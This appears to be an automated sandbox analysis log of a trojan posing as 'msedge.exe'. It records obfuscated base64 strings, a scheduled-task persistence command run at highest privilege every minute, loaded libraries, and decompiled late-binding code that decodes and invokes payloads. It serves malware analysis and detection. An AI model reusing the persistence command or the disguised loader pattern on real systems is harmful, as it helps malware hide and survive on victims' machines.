Source: msedge.exe, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: msedge.exe.0.dr, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'

Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/9@4/4

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\msedge.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\msedge.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\msedge.exe	Mutant created: \Sessions\1\BaseNamedObjects\LyRdBLj5iHwP8QCN
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6924
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: msedge.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: msedge.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\msedge.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msedge.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\msedge.exe

File read: C:\Users\user\Desktop\msedge.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\msedge.exe "C:\Users\user\Desktop\msedge.exe"
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: msedge.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\msedge.exe

Source: msedge.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: msedge.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb@w^ source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: .pdb. source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdbHm source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\msedge.PDB7 source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdbx source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdbhG source: WER1A3A.tmp.dmp.14.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
